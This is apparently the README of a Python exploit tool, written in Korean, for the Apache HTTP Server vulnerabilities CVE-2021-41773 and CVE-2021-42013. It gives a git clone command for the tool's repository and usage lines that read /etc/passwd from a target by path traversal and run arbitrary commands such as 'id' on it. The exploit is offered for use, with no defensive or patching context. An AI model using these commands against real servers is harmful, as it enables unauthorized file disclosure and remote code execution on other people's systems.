
Apache 웹 서버의 알려진 취약점(CVE-2021-41773, CVE-2021-42013)을 악용하기 위해 python3로 제작된 익스플로잇
python3으로 작성된 익스플로잇으로, Apache 웹 서버의 알려진 취약점(CVE-2021-41773, CVE-2021-42013)을 공격합니다.
Apache HTTP Server 프로젝트는 UNIX 및 Windows를 포함한 최신 운영 체제용 오픈소스 HTTP 서버를 개발 및 유지 관리하기 위한 노력입니다. 이 프로젝트의 목표는 현재 HTTP 표준에 부합하는 HTTP 서비스를 제공하는 안전하고 효율적이며 확장 가능한 서버를 제공하는 것입니다.
git clone 만 하면 됩니다:
git clone https://github.com/0xGabe/Apache-CVEs
원하는 파일을 읽으려면 파일 경로만 전달하면 됩니다. 사용자에게 읽기 권한이 없으면 읽기 결과가 표시되지 않습니다.
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
대상 머신에서 공백, 특수 문자 등이 포함된 명령을 실행하려면 명령을 따옴표로 묶어 전달해야 합니다.
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
원하는 파일을 읽으려면 파일 경로만 전달하면 됩니다. 사용자에게 읽기 권한이 없으면 읽기 결과가 표시되지 않습니다.
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
대상 머신에서 공백, 특수 문자 등이 포함된 명령을 실행하려면 명령을 따옴표로 묶어 전달해야 합니다.
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id